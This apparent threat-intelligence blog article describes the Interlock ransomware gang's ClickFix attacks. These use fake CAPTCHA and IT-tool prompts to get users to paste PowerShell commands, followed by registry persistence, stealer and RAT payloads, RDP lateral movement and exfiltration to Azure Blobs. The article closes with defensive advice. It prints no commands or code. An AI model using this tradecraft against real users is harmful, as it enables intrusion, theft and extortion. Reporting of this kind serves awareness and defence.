The Rise of ClickFix Attacks: Understanding the Interlock Ransomware Gang

The rise of the Interlock ransomware gang has marked a significant shift in the landscape of cyber threats, particularly with their innovative use of ClickFix attacks. These attacks, which gained momentum in mid-2024, exploit social engineering techniques to deceive users into executing malicious commands under the guise of troubleshooting or system maintenance. By impersonating legitimate IT tools, Interlock has successfully infiltrated corporate networks, deploying ransomware through deceptive PowerShell commands. This method not only highlights the gang’s adaptability but also underscores the growing sophistication of cyber adversaries in leveraging human psychology to breach defenses. As organizations grapple with these evolving threats, understanding the mechanics of ClickFix attacks becomes crucial for enhancing cybersecurity resilience.

ClickFix Attacks: A Deceptive Tactic

Evolution of ClickFix Attacks

ClickFix attacks have emerged as a sophisticated form of social engineering, gaining traction among cyber adversaries since mid-2024. This tactic involves manipulating users into executing malicious actions by presenting fake error messages, CAPTCHA verifications, or system prompts. Imagine receiving a pop-up that looks like a routine system update, but instead, it tricks you into copying and pasting harmful commands into your computer. The goal is to deceive users into manually copying and pasting malicious commands into their systems, often under the guise of troubleshooting or system maintenance.

The Interlock ransomware gang has been at the forefront of utilizing ClickFix attacks, particularly targeting corporate networks. By impersonating IT tools, they trick victims into executing dangerous PowerShell commands, ultimately leading to the installation of file-encrypting malware. This method has been instrumental in breaching networks and deploying ransomware, showcasing the adaptability and innovation of the Interlock group.

Techniques and Tools Used in ClickFix Attacks

The ClickFix tactic employs a variety of techniques and tools to lure victims. One common method involves using compromised legitimate websites that redirect users to domains hosting fake popup windows. These windows instruct users to paste scripts into a PowerShell terminal, initiating the malware infection process.

Interlock has been known to use fake browser and VPN client updates to install malware, a tactic that has proven effective in deceiving users. Additionally, the group has utilized fake CAPTCHA prompts, hosted on URLs mimicking legitimate portals such as Microsoft Teams and Advanced IP Scanner, to trick users into executing commands on their computers.

Impact and Reach of ClickFix Attacks

ClickFix attacks have had a significant impact, affecting companies across various industries in North America and Europe. The non-specific targeting strategy of the Interlock gang suggests that they are not limited to any particular sector, making them a formidable threat in the cybersecurity landscape.

The Sekoia researchers have observed that the Interlock ransomware gang began utilizing ClickFix attacks in January 2025, marking a shift in their tactics. This evolution highlights the increasing trend of threat actors adopting ClickFix as a preferred method for initial access and malware deployment.

Persistence and Lateral Movement

Once a system is compromised through a ClickFix attack, the Interlock group employs various techniques to maintain persistence and move laterally within the network. The malicious payload often includes a legitimate copy of the software it pretends to be, alongside an embedded PowerShell script that runs in a hidden window. This script registers a Run key in the Windows Registry for persistence and collects system information, including OS version, user privilege level, running processes, and available drives.

The command and control (C2) infrastructure used by Interlock responds with various payloads, including LummaStealer, BerserkStealer, keyloggers, and the Interlock RAT. The latter is a simple trojan that supports file exfiltration, shell command execution, and running malicious DLLs. After the initial compromise, Interlock operators use stolen credentials to move laterally via RDP, with tools like PuTTY, AnyDesk, and LogMeIn facilitating this movement.

Data Exfiltration and Ransom Demands

The final stage of a ClickFix attack involves data exfiltration and ransom demands. Stolen files are uploaded to attacker-controlled Azure Blobs, and victims are pressured into paying ransoms ranging from hundreds of thousands to millions of dollars. The Interlock ransomware group maintains a data leak portal on the dark web to increase pressure on victims, threatening to make stolen data public if payments are not made.

The ransom notes used by Interlock have evolved over time, with the latest versions focusing more on the legal aspect of data breaches and the regulatory consequences of public data exposure. This shift in strategy underscores the group’s adaptability and understanding of the psychological pressure points that can compel victims to comply with their demands.

Broader Adoption of ClickFix by Other Threat Actors

While the Interlock ransomware gang has been a prominent user of ClickFix attacks, this tactic has been adopted by a wide range of threat actors, including other ransomware gangs and nation-state actors. Notably, the infamous Lazarus Group, linked to North Korea, has used ClickFix attacks targeting job seekers in the cryptocurrency industry. Similarly, Iran-linked MuddyWater and Russia-linked APT28 have incorporated ClickFix into their cyber espionage campaigns.

The widespread adoption of ClickFix highlights its effectiveness as a social engineering technique. Adversaries have been observed using phishing, malvertising, and SEO poisoning to lure users into visiting ClickFix pages, demonstrating the versatility and adaptability of this tactic in various cyber threat scenarios.

Countermeasures and Mitigation Strategies

To combat the threat posed by ClickFix attacks, organizations must implement robust cybersecurity measures and user education programs. Key strategies include:

• User Awareness and Training: Educating users about the risks associated with social engineering tactics like ClickFix is crucial. Training programs should focus on recognizing phishing attempts, fake error messages, and other deceptive tactics used by adversaries.

• Endpoint Protection and Monitoring: Deploying advanced endpoint protection solutions can help detect and block malicious activities associated with ClickFix attacks. Continuous monitoring of network traffic and system logs can also aid in identifying suspicious behavior indicative of an ongoing attack.

• Regular Software Updates and Patching: Keeping software and systems up to date with the latest security patches can mitigate vulnerabilities that adversaries may exploit. Organizations should establish a regular patch management process to ensure timely updates.

• Network Segmentation and Access Controls: Implementing network segmentation and strict access controls can limit the lateral movement of attackers within a compromised network. This approach reduces the potential impact of a successful ClickFix attack.

• Incident Response and Recovery Plans: Developing and regularly testing incident response and recovery plans can help organizations respond effectively to ClickFix attacks. These plans should outline procedures for isolating affected systems, restoring data from backups, and communicating with stakeholders.

By adopting a multi-layered approach to cybersecurity, organizations can enhance their resilience against ClickFix attacks and other evolving threats in the digital landscape.

Final Thoughts

The evolution of ClickFix attacks, particularly by the Interlock ransomware gang, underscores the dynamic nature of cyber threats. As these tactics become more widespread, with adoption by other threat actors like the Lazarus Group and APT28, the need for robust cybersecurity measures becomes ever more pressing. Organizations must prioritize user education, implement advanced endpoint protection, and develop comprehensive incident response plans to mitigate the risks posed by such sophisticated social engineering attacks. By staying informed and proactive, businesses can better defend against the deceptive tactics that characterize the modern cyber threat landscape.

References

• Interlock ransomware gang pushes fake IT tools in ClickFix attacks, 2025, BleepingComputer source url
• How is the Interlock ransomware threat evolving in 2025?, 2025, B2B Daily source url
• ClickFix deception: A social engineering tactic to deploy malware, 2025, McAfee source url